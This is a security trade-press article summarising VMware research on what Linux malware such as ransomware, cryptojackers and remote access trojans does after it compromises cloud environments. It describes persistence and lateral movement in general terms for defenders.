Network Security

Linux-based malware: What happens once it gets in

With 90% of the cloud powered by the Linux operating system, it's predictable that malware would follow — and it certainly has. However, most modern security tools are designed to solve Windows-based threats, leaving huge gaps in protection and more questions than answers when it comes to understanding Linux-based malware, its threat to multi-cloud environments, and what organizations can do about it.

With this in mind, VMware's Threat Analysis Unit recently set out to study the growth of Linux-based malware and its threat to multi-cloud environments. The findings are captured in VMware’s Menacing Malware: Exposing threats lurking in your Linux-based multi-cloud report. VMware threat researchers spoke with SC Media about the report during a recent webcast. The research is further covered in an upcoming SC Special Focus report.

This article, the second in a series, focuses on what Linux-based malware does once it manages to infect its targets.

Ransomware proliferation

Unsurprisingly, one of the main goals of those who target Linux-based cloud environments is to unleash ransomware attacks. Such attacks, at least initially, occur much like any other type of compromise: There's an initial breach, such as an exploited application or a successful phishing attack. Then attackers burrow deeper into and gain a persistent foothold in the environment.

Once established, the attackers launch a command-and-control communication line so that ransomware can be readily executed. However, rather than exfiltrating data, the attackers will encrypt data or critical systems — essentially denying access — until payment is made.

More recently, attackers have first exfiltrated the victim's data, and if the ransom isn't paid, they threaten to release that data on the dark web. The VMware research team has also witnessed ransomware attackers shifting from targeting single installations to attacking data centers to targeting cloud workloads.

"This is a worrisome trend that I'm sure will continue for the foreseeable future as the cloud becomes more and more important," said Giovanni Vigna, senior director of threat intelligence at VMware.

Linux-based crypto miners

One of the biggest motivators for attackers who infect Linux environments is to steal computing power, commonly referred to as "cryptojacking." The process involves infecting systems with crypto mining software and stealing system CPU resources, essentially creating a digital currency. This is a lot less risky than infecting enterprises with ransomware and then trying to extort those victims for cash.

These attacks can be costly and result in more expensive electric bills, increased costs associated with cloud computing consumption, and will result in hits to cloud and system performance. However, because these attacks aren't as bold as capturing systems or data, they can run under the radar for a time.

Cryptojacking attacks are no stranger to cloud systems. As the report authors noted, "The first cryptojacking attacks was against Tesla's public cloud — a Kubernetes deployment was hijacked and dedicated to mining the currency, while the computational costs were paid by Tesla. This notorious event was just the first in a series of incidents that targeted the CPU cycles of cloud environments."

When VMware researchers applied their analysis to crypto miners, they found that nearly all miners utilize XMRig. Vigna said the amount of XMRig code sharing enabled the researchers to track the evolution of Linux-based mining software.

The team also examined the behaviors of the crypto mining samples they gathered. Similar to the behaviors observed in the ransomware samples, defense evasion is the most commonly used technique. Regarding the encryption methods associated with defense evasion, it appears the techniques crypto miners use to obfuscate data are more diversified.

"Also, for example, we noticed that crypto miners are not very concerned about detecting if they are on a virtualized workload, while ransomware is very active in trying to evade analysis," said Vigna.

Remote Access Trojans and Cobalt Strike

Whether their objective is ransomware, crypto jacking or other goals, attackers must gain control within the environment, such as creating a staging server so they can target other networked systems and move laterally, deeper, into the organization. Such is the case with Remote Access Trojans (RATs) and other implants, which serve as ways to monitor endpoints with keyloggers, take screenshots, exfiltrate or destroy data, plant additional malware (such as ransomware), and more.

This is how attackers gain and maintain control, persistence, and further their goals.

"We have to focus on how payloads actually get into place," said Brian Baskin, technical lead for VMware’s Threat Analysis Unit. He explained that understanding what mechanisms adversaries use to take control of the environment and how it's activated and detonated is essential to protecting against these threats.

One of the first things RATs and other implants do is scan for other systems accessible on the network.

"They will use that one compromised machine to jump to the next machine. They will enumerate all the resources within environments, such as the operating systems and vulnerabilities, and then use whatever exploits they can to move around," Baskin said.

The attacker may scan the entire range of IP addresses, or because servers and high-value systems are often stored at the lower or higher ends of the range, attackers will scan those areas of the range. As systems are identified, information about those systems — addresses, hostnames, active user accounts, operating systems, and software versions — are collected.

So that the attacker implant conducting this recognizance isn't discovered, communications are kept as covert as possible. They do this in several ways.

They may operate within existing encrypted tunnels or appear as just another regular operating service or application running within the background. VMware's research shows that on Linux-based multi-cloud environments, implant activities are performed as routine cron jobs, which are job schedulers. These allow Linux, macOS, and Unix environments to schedule processes to be run at regular intervals. These can include restarting the implant at regular timeframes, and this will help increase the implant's persistence.

That persistence is used to move laterally within the environment. During lateral movement, the attackers find other vulnerable systems and install more implants to increase their endurance and ability to move deeper within the environment. The attackers will also seek troves of valuable data and systems with high access levels. This can go on for weeks and months.

Learn more about the threat Linux-based malware poses and how you can defend against it

While knowing how cybercriminals operate once inside an organization’s network offers critical insight to shore up security measures, teams also require a comprehensive picture of their own environment. The next article in this series will explore why machine learning is key in detecting evolution / cross-pollination of ransomware and other malware.

For more insights in the meantime, download VMware’s full report or listen to SC Media’s webcast with VMware on what they discovered.

Bill Brenner

Bill Brenner is VP of Content Strategy at CyberRisk Alliance — an InfoSec content strategist, researcher, director, tech writer, blogger and community builder. He was formerly director of research at IANS, senior writer/content strategist at Sophos, senior tech writer for Akamai Technology’s Security Intelligence Research Team (Akamai SIRT), managing editor for and senior writer for

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.